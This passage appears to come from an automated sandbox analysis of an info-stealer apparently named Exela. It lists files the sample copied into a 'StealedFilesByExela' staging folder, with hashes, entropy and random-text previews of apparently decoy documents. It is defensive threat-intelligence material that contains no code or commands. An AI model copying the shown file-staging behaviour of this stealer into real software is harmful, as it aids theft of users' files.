                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\QNCYCDFIJJ.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\QNCYCDFIJJ.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                  MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                  SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                  SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                  SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SQSJKEBWDT.mp3

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                  MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                  SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                  SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                  SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SUAVTZKNFL.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\GAOBCVIQIJ.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                  MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                  SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                  SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                  SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\IPKGELNTQY.docx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.695505889681456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                                                                                                                                                                                                                  MD5:3E1BF32E65136B415337727A75BB2991
                                                                                                                                                                                                                                  SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                                                                                                                                                                                                                  SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                                                                                                                                                                                                                  SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                                                                                                                                                                                                                  Malicious:false
